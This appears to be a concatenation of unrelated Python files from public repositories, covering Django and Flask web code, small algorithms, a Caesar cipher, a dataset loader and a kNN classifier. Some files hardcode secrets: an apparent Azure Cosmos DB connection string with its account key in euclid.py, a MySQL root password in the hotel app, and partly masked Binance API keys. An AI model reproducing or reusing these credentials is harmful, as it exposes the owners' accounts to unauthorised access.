cdebec198330262eb6b6df4c311c5c25f1cc888c
|
[] |
no_license
|
amitbhalla/feelfreetocode
|
ce757b8c075509be62c1204de7ed1e5b313d8c8a
|
9d642fbda8278d40270b318cc625051848410cec
|
refs/heads/main
| 2023-07-11T03:52:25.272889
| 2021-08-29T16:40:12
| 2021-08-29T16:40:12
| 396,765,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.urls import path
from .views import test_view
urlpatterns = [
path("test/", test_view, name="test-api"),
]
|
[
"amit9815@gmail.com"
] |
amit9815@gmail.com
|
00991077f6a5359ded0a86e65f894c7c40050c85
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/FiPf9yTEfo5aBikPF_8.py
|
97078faf7f02374fa833a7b236d05ec723cafa2d
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def coins_combinations(target, coins):
ways = [1] + [0] * target
for coin in coins:
for i in range(coin, target + 1):
ways[i] += ways[i - coin]
return ways[target]
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
499f6d90b53fc65d2df4ef3898feec12f9ac46d5
|
cd7897102db3d46738353880dac3376773c09002
|
/blog/members/views.py
|
0c62115c4c5e5fdbd9c960aa81baa806a3d3c4d9
|
[] |
no_license
|
yaroslavgladunn/simpleblog
|
bd01c42c84827aa6a8bc254dbc0f856a4e8cbcd8
|
a621cf9e6bd4c3c58aae71062ea77882c4bdc0fb
|
refs/heads/master
| 2023-06-28T00:21:58.098537
| 2021-07-28T14:13:34
| 2021-07-28T14:13:34
| 390,375,918
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,200
|
py
|
from django.shortcuts import render, get_object_or_404
from django.urls import reverse_lazy
from django.views import generic
from django.views.generic import DetailView, CreateView, ListView
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from . forms import SignUpForm, UpdateProfileForm, PasswordChangingForm, ProfilePageForm
from django.contrib.auth.views import PasswordChangeView
from django.contrib.auth.forms import PasswordChangeForm
from main.models import Profile, Post
class PortfolioView(ListView):
model = Post
template_name = 'user_profile.html'
ordering = ['-id']
class CreateProfilePage(CreateView):
model = Profile
form_class = ProfilePageForm
template_name = 'registration/create_profile_page.html'
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
class EditProfilePageView(generic.UpdateView):
model = Profile
template_name = 'registration/edit_profilepage.html'
fields = ['bio', 'country', 'profile_pic', 'website_url', 'facebook_url', 'instagram_url', 'twitter_url', 'pinterest_url']
success_url = reverse_lazy('home')
class ProfilePageView(DetailView):
model = Profile
template_name = 'registration/user_profile.html'
def get_context_data(self, *args, **kwargs):
users = Profile.objects.all()
context = super(ProfilePageView, self).get_context_data()
page_user = get_object_or_404(Profile, id=self.kwargs['pk'])
context['page_user'] = page_user
return context
class PasswordsChangeView(PasswordChangeView):
form_class = PasswordChangingForm
success_url = reverse_lazy('password_success')
def password_success(request):
return render(request, 'registration/password_success.html', {})
class UserRegister(generic.CreateView):
form_class = SignUpForm
template_name = 'registration/register.html'
success_url = reverse_lazy('login')
class UserEditView(generic.UpdateView):
form_class = UpdateProfileForm
template_name = 'registration/edit_profile.html'
success_url = reverse_lazy('home')
def get_object(self): return self.request.user
|
[
"debtyman@gmail.com"
] |
debtyman@gmail.com
|
272c8d246f2d0edc452d824052b27a930915a10d
|
f7dcfa02f2cbf0838767b7d3fdbea4de7af22f39
|
/NetworkSecurityLab1/NetworkSecurityLab1.py
|
f05e78c049d1afc3859fa15ae19509473fdf3e00
|
[] |
no_license
|
mutterbucket/NetworkSecurity
|
baacab24e26c36e9a0327e3d2a50bff490e4d8e9
|
1fed3869210a3f96d1cdca3949340351d0a9520a
|
refs/heads/master
| 2021-03-24T20:49:31.406616
| 2020-03-15T22:40:50
| 2020-03-15T22:40:50
| 247,564,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,471
|
py
|
alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
def encrypt():
key = input("What is the key for the Caesar shift? ")
key = key.upper() #Everything is processed uppercase
keyindex = alphabet.index(key)
plaintext = input("Enter your plaintext: \n")
plaintext = plaintext.upper()
for x in plaintext: #Each letter is shifted by the distance
letterindex = alphabet.index(x) #between the key and the letter A
if (letterindex + keyindex) > 25:
letterindex = letterindex + keyindex - 26
print (alphabet[letterindex], end = '')
else:
letterindex += keyindex
print (alphabet[letterindex], end = '')
print()
def decrypt():
ciphertext = input("Enter your ciphertext: \n") #All possible solutions are printed
ciphertext = ciphertext.upper()
for x in alphabet:
keyindex = alphabet.index(x)
print (keyindex, ":", end = '')
for y in ciphertext:
letterindex = alphabet.index(y)
if (letterindex + keyindex) > 25:
letterindex = letterindex + keyindex - 26
print (alphabet[letterindex], end = '')
else:
letterindex += keyindex
print (alphabet[letterindex], end = '')
print()
print("Welcome to the Caesar Cipher!")
task = input("Would you like to (E)ncrypt or (D)ecrypt? ")
task = task.upper()
if task == 'E':
encrypt()
elif task == 'D':
decrypt()
else:
print ("Perhaps next time")
|
[
"43102357+mutterbucket@users.noreply.github.com"
] |
43102357+mutterbucket@users.noreply.github.com
|
cc2a1b35d826a740d1f8d108cb04d6b8939050ba
|
8ab66dcf8e91734d730f7799839ceddfa289b4cd
|
/barnacle-1.0.0/src/parsers/genes/ensg.py
|
1ef1afad3eb1dbc3815c9f89c921f5cdd72be45f
|
[] |
no_license
|
ptraverse/gsc
|
7bbbe67652575b5e7d3ca68e85a213fd7536125d
|
21e6b699f91cf9604f973d51745c3975cbd8e22c
|
refs/heads/master
| 2021-01-23T17:58:50.910026
| 2013-01-03T09:06:05
| 2013-01-03T09:06:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,951
|
py
|
"""
ensg.py
Created by Readman Chiu
Edited by Lucas Swanson
Copyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. All rights reserved.
"""
import transcript
from optparse import OptionParser
import os
fields = {0:"name", 1:"chrom", 2:"strand", 3:"txStart", 4:"txEnd",
5:"exonCount", 6:"exonStarts", 7:"exonEnds"}
def parse(file):
txts = []
ff = open(file, 'r')
for line in ff.readlines():
cols = line.split("\t")
if cols[0]:
txt = transcript.Transcript(cols[1])
for i in range(len(cols)):
if i in fields:
if i < 8:
setattr(txt, fields[i], cols[i])
exonStarts = cols[6].rstrip(',').split(',')
exonEnds = cols[7].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
#print txt.name, txt.exonCount, txt.length, txt.exons[0]
txts.append(txt)
ff.close()
return txts
def parse_line(line):
cols = line.split("\t")
if cols[0]:
txt = transcript.Transcript(cols[1])
for i in range(len(cols)):
if i in fields:
if i < 8:
setattr(txt, fields[i], cols[i])
exonStarts = cols[6].rstrip(',').split(',')
exonEnds = cols[7].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
return txt
return None
def index(input, output):
indices = {}
data_file = os.path.abspath(input)
line_num = 1
for line in open(input, 'r'):
cols = line.rstrip().split("\t")
start = int(int(cols[3])/1000)
end = int(int(cols[4])/1000)
target = cols[1]
for n in range(start,end+1):
index = ':'.join((target,str(n)))
value = str(line_num)
if not indices.has_key(index):
indices[index] = [value]
else:
indices[index].append(value)
line_num += 1
index_file = open(output, 'w')
for index in sorted(indices.keys()):
index_file.write(' '.join((index, ','.join(indices[index]))) + "\n")
if __name__ == '__main__':
usage = "Usage: %prog annotation-file"
parser = OptionParser(usage=usage)
parser.add_option("-i", "--index", dest="index", help="index output file")
(options, args) = parser.parse_args()
if options.index:
index(args[0], options.index)
|
[
"philippe.traverse@gmail.com"
] |
philippe.traverse@gmail.com
|
d6d54dd17e23114be695e165facff7061e49ed26
|
f1e3535eb173076192b4e0f2ac7b7025c574c576
|
/vacancy.py
|
0ae4f08ca96c8a808d537f95e9dab3d503680cd4
|
[] |
no_license
|
ravi2129/HotelBillingSystem
|
90dcf63f679b871e430d4bafb38b3fa6dadc9f95
|
3f2809c8fe05d8771d164e1a4965295801ebf3b4
|
refs/heads/master
| 2023-06-16T23:03:21.903826
| 2021-07-16T17:11:20
| 2021-07-16T17:11:20
| 386,711,431
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
from tkinter import *
import mysql.connector
root = Tk(className=" HOTEL MANAGEMENT")
root.geometry('1200x600')
# heading
heading_label = Label(root, text="--------- ALL VACANCIES ---------", font=('Orbitron', 15), bg="black", fg="white")
heading_label.pack(fill=X)
top_frame = Frame(root)
top_frame.pack()
# label
o_label = Label(top_frame, text='OCCUPIED', fg='red', font=('Orbitron', 25))
u_label = Label(top_frame, text='UN-OCCUPIED', fg='green', font=('Orbitron', 25))
o_label.grid(row=0, column=0)
u_label.grid(row=0, column=1)
# text bar
text_o = Text(top_frame, bd=5, fg="red", width=50, bg='#b3ffe6', font=('Teko SemiBold', 20))
text_o.grid(row=1, column=0)
text_u = Text(top_frame, bd=5, fg="green", width=50, bg='#b3ffe6', font=('Teko SemiBold', 20))
text_u.grid(row=1, column=1)
# data Show
rooms = [100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110,
200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210,
300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310,
400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410,
500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510]
mydb = mysql.connector.connect(host='localhost', user='root', password='Admin1234', database='hotel')
cur = mydb.cursor()
cur.execute('SELECT Room_No from hotel_management')
result = cur.fetchall()
occupied_rooms = []
for i in result:
a = list(i)
occupied_rooms.append(a[0])
c1 = 0
c2 = 0
for j in rooms:
if j in occupied_rooms:
text_o.insert(INSERT, str(j))
text_o.insert(INSERT, "\t")
c1 = c1 + 1
if c1 == 6:
text_o.insert(INSERT, "\n")
c1 = 0
else:
text_u.insert(INSERT, str(j))
text_u.insert(INSERT, "\t")
c2 = c2 + 1
if c2 == 6:
text_u.insert(INSERT, "\n")
c2 = 0
root.mainloop()
|
[
"ravirajdange1234@gmail.com"
] |
ravirajdange1234@gmail.com
|
92c3e4dd4b78b2184b1fa13bbb9217ce0ce57cc7
|
b9b19245a0d5bafbc33ca46c204cee61cb34549b
|
/Test-Site/app/DATA.py
|
c6defff07a07fa409aff12df1e32477131fd6686
|
[] |
no_license
|
minhminh322/vinhr-test-site
|
f2cf5a81ad4e25e5e99d47f3a1dc23d346e9e8c7
|
2601457e73f59d9f4e99c1c0a10388fd5683157b
|
refs/heads/master
| 2022-04-10T04:18:20.151454
| 2019-12-17T05:07:01
| 2019-12-17T05:07:01
| 228,536,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,340
|
py
|
import numpy as np
from datetime import datetime, timedelta
from pathlib import Path
import subprocess
import os
from src.imports import *
from src.connectors import cosmos
from time import time
import pandas as pd
from config import (
DATA_FILENAME,
DATA_FOLDER
)
def init_():
# global DB
# DB = mongo.mongo_connect()
# print('Initializing data')
# start = time()
connect_string='mongodb://w2c-healthcheck:fXhZ7CvUSHN6L18MtNS86SoaHbe20BB3yQxPzGmLGGnVGWMh4e63a2l3YSFK94Qvc9MmsyfLMVw8GWDxUBOxng==@w2c-healthcheck.documents.azure.com:10255/?ssl=true&replicaSet=globaldb'
global DB
DB = cosmos.get_database(connect_string,'testsite')
print('Initializing data')
### load label map
# Label map contains metadata about the labels, like the label in vietnamese,
# color code for this label to show
#labels_list = ['DG','DX','HB','LN','LC','OT']
df_label_map = pd.read_csv((DATA_FOLDER/'label_map.csv').str())
#df_label_map = df_label_map[df_label_map.Code.isin(labels_list)].reset_index(drop=True)
### load label map
# Label map contains metadata about the labels, like the label in vietnamese,
# color code for this label to show
#labels_list = ['DG','DX','HB','LN','LC','OT']
#df_label_map = df_label_map[df_label_map.Code.isin(labels_list)].reset_index(drop=True)
|
[
"ptminh2013@gmail.com"
] |
ptminh2013@gmail.com
|
61bbc1803f66e0ce1eb371b599d5c88b02d5222a
|
6beeacc1cfff817885ee25f8eee9e6beb4225e14
|
/forms.py
|
115c6a9d672288a98eb1d06ca9f0ff51fe174b2f
|
[] |
no_license
|
Aaqib5wani/blogging-web-app
|
52f80678b6b5e1e251f578c7bdc3fb191636f4b8
|
479d3f4a6f88c4d35390c36edc77e9d5b7f379c1
|
refs/heads/main
| 2023-05-01T23:50:16.247450
| 2021-05-22T22:37:32
| 2021-05-22T22:37:32
| 353,586,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
from flask_wtf import FlaskForm
from wtforms import Form,validators,StringField,SubmitField,PasswordField,TextField,TextAreaField
from wtforms.validators import DataRequired,length,Email,EqualTo,email_validator
class Register(FlaskForm):
username = StringField('Username',validators=[DataRequired(),length(max=20,min=2)])
name = StringField('Name', validators=[DataRequired(), length(max=40, min=2)])
email = StringField('Email', validators=[DataRequired(), length(max=50, min=2),Email()])
password=PasswordField('Password',validators=[DataRequired()])
confirm_password=PasswordField('Confirm_password',validators=[DataRequired(),EqualTo('password')])
submit=SubmitField('Submit')
class Login(FlaskForm):
email = StringField('Email', validators=[DataRequired(), length(max=50, min=2),Email()])
password=PasswordField('Password',validators=[DataRequired()])
submit=SubmitField('Submit')
class Enter_post(FlaskForm):
title = StringField('title',validators=[DataRequired(),length(max=100,min=5)])
subtitle = StringField('subtitle', validators=[DataRequired(), length(max=50, min=2)])
content = TextAreaField('content', validators=[DataRequired(), length(max=10000, min=10)])
submit=SubmitField('Submit')
|
[
"aqib.ahmad76@yahoo.com"
] |
aqib.ahmad76@yahoo.com
|
c2fed0456acb3e83e3cc74e55ca7759f86496a17
|
9217fc7adb14677a60b928e114bcbfa48eeae2c1
|
/FIbonacci sequence generator.py
|
69150f71431d6b9ec35ee2668f997dc65aac9900
|
[] |
no_license
|
DaniloPierpaoli/Some-code-might-make-sense-Python-
|
e26a883ec8f0ecc09430243a9c5188d86ef8ad5e
|
540298cbf35e7f7d54988e498a103241020d7e7c
|
refs/heads/main
| 2023-02-28T18:56:33.890753
| 2021-02-11T21:05:18
| 2021-02-11T21:05:18
| 305,863,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,788
|
py
|
''' This script generates n numbers within the Fibonacci sequence.
It contains a main function and a nested function within it'''
def fib_gen(n):
'''This function is called by main_func().
It's a generator that takes n as argument.
It iterates n times'''
iterations = 0
fib_num = 0
next_num = 1
while iterations < n:
yield fib_num
fib_num, next_num = next_num, fib_num + next_num
iterations += 1
def main_func():
''' This function asks first how many numbers of the sequence are needed.
Then it asks whether the whole sequence up to the n-number needs to be
printed or only the n-number. In the first case the iterator will print()
out each element generated by the nested function. In the latter, a list
will be casted and then printed out the last element of it.'''
while True:
try:
n = int(input("How many numbers in the Fibonacci series do you need?"))
except ValueError:
print('Please insert an integer!')
break
else:
pass
if n > 0:
pass
else:
print('No numbers!')
break
print('Do you want to know only the n-th number in the Fibonacci sequence')
print('or you want to see generated the whole sequence?')
choice = int(input('Please press 1 for the first option or press 2 for the second option'))
if choice == 1:
list_cast = list(fib_gen(n))
print(f'The {n}-th number of the Fibonacci sequence is {list_cast[-1]}')
break
else:
for item in fib_gen(n):
print(item)
break
if __name__ == '__main__':
main_func()
|
[
"noreply@github.com"
] |
DaniloPierpaoli.noreply@github.com
|
0b517f1055cff39cd955e436fb7d0efeb2a31469
|
3d504a0bc1c110d8c63daf485aa0bd0491068d72
|
/StockBot/config.py
|
ae73823705fcde9a3f515c3f1ca6940ed12e21e2
|
[
"MIT"
] |
permissive
|
parateakshay/StockBot
|
4bd3126fffc6dac91eca5882bbecf9769fc46fda
|
2f50da19451b352ae6d27f6b8c7cf3b2744c321b
|
refs/heads/main
| 2023-05-16T23:45:02.854056
| 2021-05-30T06:22:45
| 2021-05-30T06:22:45
| 372,135,004
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
# enter your own api key and api secret from your binance account
API_KEY = 'quoYMl0sL********************Lir8BXW1H8C1Qg******pXTeWhU9wKy'
API_SECRET = 'oI72****************LhIlh66BZpiVWwEZ2R2*******zRGD'
|
[
"49017391+parateakshay@users.noreply.github.com"
] |
49017391+parateakshay@users.noreply.github.com
|
3aa1a3ed0fa9ca760bd6c4c5d61f13ee0d6e9421
|
5b8d0cd314fdd4537bc77ce9209ca903694b02e8
|
/datasets/un_multi/un_multi.py
|
a6feaad48a61c782c0fa14b118fc5305145bbcf2
|
[
"Apache-2.0"
] |
permissive
|
amankhandelia/datasets
|
97106f6d98b9cd17c50b1bf0c91f4ced6240dfd6
|
1a138f9bd2d1b62a255736375001bf918d36508d
|
refs/heads/master
| 2023-06-21T01:08:25.212378
| 2021-07-26T13:27:59
| 2021-07-26T13:27:59
| 389,644,974
| 1
| 0
|
Apache-2.0
| 2021-07-26T14:36:09
| 2021-07-26T13:36:08
| null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MultiUN: Multilingual UN Parallel Text 2000—2009"""
import itertools
import os
import datasets
_CITATION = """\
@inproceedings{eisele-chen-2010-multiun,
title = "{M}ulti{UN}: A Multilingual Corpus from United Nation Documents",
author = "Eisele, Andreas and
Chen, Yu",
booktitle = "Proceedings of the Seventh International Conference on Language Resources and Evaluation ({LREC}'10)",
month = may,
year = "2010",
address = "Valletta, Malta",
publisher = "European Language Resources Association (ELRA)",
url = "http://www.lrec-conf.org/proceedings/lrec2010/pdf/686_Paper.pdf",
abstract = "This paper describes the acquisition, preparation and properties of a corpus extracted from the official documents of the United Nations (UN). This corpus is available in all 6 official languages of the UN, consisting of around 300 million words per language. We describe the methods we used for crawling, document formatting, and sentence alignment. This corpus also includes a common test set for machine translation. We present the results of a French-Chinese machine translation experiment performed on this corpus.",
}
@InProceedings{TIEDEMANN12.463,
author = {J�rg Tiedemann},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {Proceedings of the Eight International Conference on Language Resources and Evaluation (LREC'12)},
year = {2012},
month = {may},
date = {23-25},
address = {Istanbul, Turkey},
editor = {Nicoletta Calzolari (Conference Chair) and Khalid Choukri and Thierry Declerck and Mehmet Ugur Dogan and Bente Maegaard and Joseph Mariani and Jan Odijk and Stelios Piperidis},
publisher = {European Language Resources Association (ELRA)},
isbn = {978-2-9517408-7-7},
}
"""
_DESCRIPTION = """\
This is a collection of translated documents from the United Nations. \
This corpus is available in all 6 official languages of the UN, \
consisting of around 300 million words per language
"""
_HOMEPAGE = "http://www.euromatrixplus.net/multi-un/"
_LANGUAGES = ["ar", "de", "en", "es", "fr", "ru", "zh"]
_LANGUAGE_PAIRS = list(itertools.combinations(_LANGUAGES, 2))
_BASE_URL = "http://opus.nlpl.eu/download.php?f=MultiUN/v1/moses"
_URLS = {f"{l1}-{l2}": f"{_BASE_URL}/{l1}-{l2}.txt.zip" for l1, l2 in _LANGUAGE_PAIRS}
class UnMulti(datasets.GeneratorBasedBuilder):
"""MultiUN: Multilingual UN Parallel Text 2000—2009"""
VERSION = datasets.Version("1.0.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name=f"{l1}-{l2}", version=datasets.Version("1.0.0"), description=f"MultiUN {l1}-{l2}")
for l1, l2 in _LANGUAGE_PAIRS
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{"translation": datasets.features.Translation(languages=tuple(self.config.name.split("-")))}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
lang_pair = self.config.name.split("-")
data_dir = dl_manager.download_and_extract(_URLS[self.config.name])
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"source_file": os.path.join(data_dir, f"MultiUN.{self.config.name}.{lang_pair[0]}"),
"target_file": os.path.join(data_dir, f"MultiUN.{self.config.name}.{lang_pair[1]}"),
},
),
]
def _generate_examples(self, source_file, target_file):
source, target = tuple(self.config.name.split("-"))
with open(source_file, encoding="utf-8") as src_f, open(target_file, encoding="utf-8") as tgt_f:
for idx, (l1, l2) in enumerate(zip(src_f, tgt_f)):
result = {"translation": {source: l1.strip(), target: l2.strip()}}
yield idx, result
|
[
"noreply@github.com"
] |
amankhandelia.noreply@github.com
|
cfab785ce084dc5579df6d95bd1a5684db5979c8
|
1180c0bfe29959d95f3c131e6e839950e528d4ee
|
/27/bbelderbos/reddit.py
|
0cd0f37cd9d9c63eac8c4db733b8ed907e730fa1
|
[] |
no_license
|
pybites/challenges
|
e3e461accd8e7f890aee8007ba5070086ef983fc
|
02b77652d0901e6e06cb9b1e7cb3e59c675445c2
|
refs/heads/community
| 2023-08-20T18:19:02.982214
| 2022-11-17T09:23:31
| 2022-11-17T09:23:31
| 78,264,928
| 764
| 3,115
| null | 2023-07-21T05:58:19
| 2017-01-07T07:17:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
import os
import praw
DEFAULT_SUBREDDIT = 'learnpython'
reddit = praw.Reddit(client_id=os.environ.get('PRAW_CLIENT_ID'),
client_secret=os.environ.get('PRAW_CLIENT_SECRET'),
password=os.environ.get('PRAW_PASSWORD'),
user_agent='pybites_codechallenges by /u/bbelderbos',
username='bbelderbos')
def submit_to_reddit(post, subreddit=DEFAULT_SUBREDDIT):
'''Submits post to subreddit'''
title = post.title
text = '{} - {}'.format(post.summary, post.url)
return reddit.subreddit(subreddit).submit(title,
selftext=text)
|
[
"pybites@projects.bobbelderbos.com"
] |
pybites@projects.bobbelderbos.com
|
a365c0900c5259c9243e20eb8b7601ae313932a4
|
da717bc538ac2606c881e917e862b6a6ed7dee55
|
/models/time.py
|
3e49c6388cb21b46c4bfebc84d69280ebe2c2ec8
|
[] |
no_license
|
bavaria95/taxi-service
|
25f59f6949a037112f4a95fd0054273ec16d7ba7
|
463db8fdc26e417d43fa201451903afd942c1a27
|
refs/heads/master
| 2022-11-30T01:21:22.689407
| 2020-08-06T22:49:02
| 2020-08-06T22:49:02
| 285,102,153
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
class Time(object):
'''
Represents time entity in our world.
By default we start from timestamp 0
By calling `.tick` method we increment time in our world (by default on 1 unit)
'''
def __init__(self, time=0):
self._time = time
def __repr__(self):
return self._time
def tick(self, i=1):
self._time += i
@property
def time(self):
return self._time
|
[
"petruk@ebu.ch"
] |
petruk@ebu.ch
|
f5bb3595b110a02703f4d2c0f334882150534e0d
|
bb52e1ad4b70b1e26a7e075258dcc7cc9afc3670
|
/hw3/CS430_AakefWaris_HW3/dataStructures/Trees.py
|
9d0aa38df26be7548f32aee42be6774c8f41b329
|
[] |
no_license
|
awaris123/cs430
|
644c557bf4225aaf474ae0b1ab7bd5afa22d7946
|
27ae28d6fd3ff6f8705c4dde43341882ffdb900d
|
refs/heads/master
| 2022-07-14T19:03:13.773947
| 2020-03-10T21:01:05
| 2020-03-10T21:01:05
| 239,395,459
| 0
| 1
| null | 2022-06-22T01:24:02
| 2020-02-10T00:14:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,589
|
py
|
class Heap:
def __init__(self, key=lambda x:x):
self.data = []
self.key = key
@staticmethod
def _parent(idx):
return (idx-1)//2
@staticmethod
def _left(idx):
return idx*2+1
@staticmethod
def _right(idx):
return idx*2+2
def heapify(self, idx=0):
while True:
l = Heap._left(idx)
r = Heap._right(idx)
maxidx = idx
if l < len(self) and self.key(self.data[l]) > self.key(self.data[idx]):
maxidx = l
if r < len(self) and self.key(self.data[r]) > self.key(self.data[maxidx]):
maxidx = r
if maxidx != idx:
self.data[idx], self.data[maxidx] = self.data[maxidx], self.data[idx]
idx = maxidx
else:
break
def add(self, x):
self.data.append(x)
i = len(self.data) - 1
p = Heap._parent(i)
while i > 0 and self.key(self.data[p]) < self.key(self.data[i]):
self.data[i], self.data[p] = self.data[p], self.data[i]
i = p
p = Heap._parent(i)
def peek(self):
return self.data[0]
def pop(self):
ret = self.data[0]
self.data[0] = self.data[len(self.data)-1]
del self.data[len(self.data)-1]
self.heapify()
return ret
def __bool__(self):
return len(self.data) > 0
def __len__(self):
return len(self.data)
def __repr__(self):
return repr(self.data)
|
[
"awaris@hawk.iit.edu"
] |
awaris@hawk.iit.edu
|
98ca1c0a18b55a68e9da55eca21ddd19fec6a124
|
8232c899532ac77c5b20f0651bac062c57509a7f
|
/Aulas/032.py
|
0d6891f0540afa5e503fe59e26409084e968fa0b
|
[] |
no_license
|
Rollbusch/Learning-Python
|
1b9d957e0090d8095e95b150494614fcc69defc2
|
de8b3c78dad472bf8690edd0adfcb75e3a1159ac
|
refs/heads/main
| 2023-05-05T00:43:26.677134
| 2021-05-19T15:47:13
| 2021-05-19T15:47:13
| 368,921,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
from datetime import date
ano = int(input('Que ano quer analisar ? Coloque 0 para analizar o ano atual: '))
if ano == 0:
ano = date.today().year # importa o ano do dia de hoje.
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('O ano É bissexto')
else:
print('O ano NÃO É bissexto')
print('Ano analisado: {}'.format(ano))
|
[
"RollbuschPlay@hotmail.com"
] |
RollbuschPlay@hotmail.com
|
1283c2282531b9e62beb9fa486f32df182acf868
|
781e2692049e87a4256320c76e82a19be257a05d
|
/assignments/python/series/src/139.py
|
8e64d3c15de6596fb8a75a48d232e64b488e519a
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
def slices(numbers, slicesize):
numlist = []
resultlist = []
for i in xrange(len(numbers)):
numlist.append(int(numbers[i]))
for i in xrange(len(numlist)-slicesize+1):
if not numlist[i:i+slicesize]:
pass
else:
resultlist.append(numlist[i:i+slicesize])
if not resultlist:
raise ValueError()
else:
return resultlist
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
a6aca129c6f8fbfc57a41360378db1348932274e
|
fae3d8d975aacf82bc38d05bc47ab698b159fb9f
|
/euclid.py
|
931960414e291f188a544c58a0a47bef7d8c7cad
|
[] |
no_license
|
radsn23/ML-alg
|
666d234dc86eecaf28a030ee81aabe40e3ded223
|
c48f75bc0e1db0c6b8941843a613ddb155425cff
|
refs/heads/master
| 2021-06-13T14:38:49.664247
| 2017-02-16T07:56:47
| 2017-02-16T07:56:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,036
|
py
|
import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
# [[plt.scatter(ii[0],ii[1], s=100, color = i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_features[0], new_features[1])
# plt.show()
def knn(data,predict,k = 3):
if len(data) >= k:
warnings.warn('idiot!')
distances = []
for group in data:
for features in data[group]:
#euclidean_distance = sqrt((features[0] - predict[0])**2 + (features[1] - predict[1])**2)
euclid_dist = np.linalg.norm(np.array(features) - np.array(predict))
distances.append([euclid_dist, group])
votes = [i[1] for i in sorted(distances)[:k]]
# print(Counter(votes).most_common(1))
vote_result = Counter(votes).most_common(1)[0][0]
confidence = Counter(votes).most_common(1)[0][1] / k
return vote_result, confidence
accuracies = []
for i in range(5):
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?',-99999, inplace=True)
df.drop(['id'],1, inplace=True)
full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
train_set = {2:[], 4:[]}
test_set = {2:[], 4:[]}
train_data = full_data[:-int(test_size* len(full_data))]
test_data = full_data[-int(test_size* len(full_data)):]
#now we want to populate these dictionaries
for i in train_data:
train_set[i[-1]].append(i[:-1])
for i in test_data:
test_set[i[-1]].append(i[:-1])
#now we need to pass the info to kNN
correct = 0
total = 0
for group in test_set:
for data in test_set[group]:
vote, confidence = knn(train_set, data, k=5)
if group == vote:
correct +=1
#else:
#print(confidence)
total +=1
# print('Accuracy:', correct/total)
accuracies.append(correct/total)
print(sum(accuracies)/len(accuracies))
#now we want to compare this to scikit-learn
|
[
"noreply@github.com"
] |
radsn23.noreply@github.com
|
